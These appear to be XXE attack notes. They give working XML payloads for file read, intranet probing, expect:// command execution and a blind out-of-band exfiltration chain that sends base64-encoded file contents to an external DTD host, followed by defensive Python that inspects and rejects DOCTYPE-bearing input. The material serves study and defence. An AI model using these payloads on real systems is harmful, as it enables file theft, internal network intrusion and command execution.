With echo (the result is returned in the response)

  • Reading a file

    ```xml
    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///d://test.txt">
    ]>
    <x>&xxe;</x>
    ```
  • Intranet probing, or attacking an intranet application (by triggering a vulnerable URL); almost never encountered in real-world scenarios

    Triggering this requires the following preconditions:
    ① an intranet IP address
    ② an open port
    ③ an XXE vulnerability
    ④ a crafted URL that triggers the vulnerability

    ```xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY rabbit SYSTEM "http://192.168.80.1:80/test.txt" >
    ]>
    <x>&rabbit;</x>
    ```
  • RCE; almost never encountered in real-world scenarios

    This case executes a system command in a PHP environment that has the expect extension installed:

    ```xml
    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "expect://id" >
    ]>
    <x>&xxe;</x>
    ```
  • Importing an external DTD (via a parameter entity)

    ```xml
    <?xml version="1.0" ?>
    <!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://127.0.0.1:80/evil2.dtd">
    %file;
    ]>
    <x>&send;</x>
    ```

    Contents of evil2.dtd, served from http://127.0.0.1:80/evil2.dtd:

    ```xml
    <!ENTITY send SYSTEM "file:///d:/test.txt">
    ```

Without echo (blind: nothing is returned in the response)

  • Reading a file

    ```xml
    <?xml version="1.0"?>
    <!DOCTYPE test [
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
    <!ENTITY % dtd SYSTEM "http://127.0.0.1:80/evil2.dtd">
    %dtd;
    %send;
    ]>
    ```

    Contents of evil2.dtd, served from http://127.0.0.1:80/evil2.dtd:

    ```xml
    <!ENTITY % payload
    "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1:80/?data=%file;'>"
    >
    %payload;
    ```
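A defender-side check, added here as an example and not part of the original notes: it uses only Python's standard-library expat binding (the notes target PHP, so this stack is an assumption) to inspect an untrusted document's DTD, records every external entity declaration and reference in the payloads above without fetching any of them, and rejects any document that carries a DOCTYPE at all. The sample documents are constructed copies of the payloads above.

```python
import xml.parsers.expat as expat

def inspect_xml(data: bytes) -> dict:
    """Report what the DTD of `data` declares and references, resolving none of it."""
    report = {"doctype": None, "entities": [], "external_refs": [], "parse_error": None}
    p = expat.ParserCreate()
    # Never expand parameter entities (%name;), so an external DTD like evil2.dtd is not fetched.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def start_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name
    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # A SYSTEM identifier means an external entity (file://, http://, php://, expect://).
        report["entities"].append({"name": name, "parameter": bool(is_param), "system_id": sysid})
    def external_ref(context, base, sysid, pubid):
        # Fired for &xxe; in content: record the target, return 1 ("handled"), open nothing.
        report["external_refs"].append(sysid)
        return 1
    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.ExternalEntityRefHandler = external_ref
    try:
        p.Parse(data, True)
    except expat.ExpatError as e:
        # Blind payloads are often a bare prolog with no root element; keep what was collected.
        report["parse_error"] = str(e)
    return report

def allowed(data: bytes) -> bool:
    """Policy: refuse any document carrying a DOCTYPE at all, the standard XXE mitigation."""
    return inspect_xml(data)["doctype"] is None

# Constructed samples copied from the notes above, plus a benign document.
DIRECT_READ = b'''<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x>&xxe;</x>'''
BLIND_PE = b'''<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:80/evil2.dtd">
%dtd;
%send;
]>'''
BENIGN = b'<?xml version="1.0"?><x>hello</x>'

if __name__ == "__main__":
    for label, doc in [("direct", DIRECT_READ), ("blind", BLIND_PE), ("benign", BENIGN)]:
        print(label, "allowed" if allowed(doc) else "rejected", inspect_xml(doc))
```

The report shows where each payload would reach out to (file://, php://, or the attacker's DTD host) before any real parser is handed the document.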